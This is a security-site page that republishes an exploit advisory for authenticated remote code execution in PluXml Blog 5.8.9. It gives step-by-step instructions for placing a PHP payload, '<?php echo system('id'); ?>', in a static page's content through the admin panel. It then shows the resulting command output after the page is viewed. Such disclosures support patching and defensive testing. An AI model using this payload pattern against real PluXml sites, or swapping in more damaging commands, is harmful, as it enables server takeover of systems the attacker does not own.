Home Tools Exploits & CVE's PluXml Blog 5.8.9 Remote Code Execution

PluXml Blog 5.8.9 Remote Code Execution

January 11, 2024

176

Authored by tmrswrr

PluXml Blog version 5.8.9 suffers from a remote code execution vulnerability.

## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)
### Date: 2024-1-7
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://pluxml.org/
### Version : 5.8.9
### Tested on: https://www.softaculous.com/apps/cms/PluXml

1 ) After login Click Static pages > Edit > Write in content your payload : https://127.0.0.1/PluXml/core/admin/statique.php?p=001

    Payload : <?php echo system('id'); ?>

2 ) Save and View page Static 1 on site :https://127.0.0.1/PluXml/static1/static-1

    Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

PluXml Blog 5.8.9 Remote Code Execution

Follow us on Instagram @thecyberpost

EDITOR PICKS

osCommerce 4 Cross Site Scripting

undefinedExploiting The NT Kernel In 24H2undefined

Windows NtQueryInformationThread Double-Fetch / Arbitrary Write

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Intrasrv Simple Web Server 1.0 Denial Of Service

Kik Messenger XMPP Stanza Smuggling

CoolAdmin 1.0 SQL Injection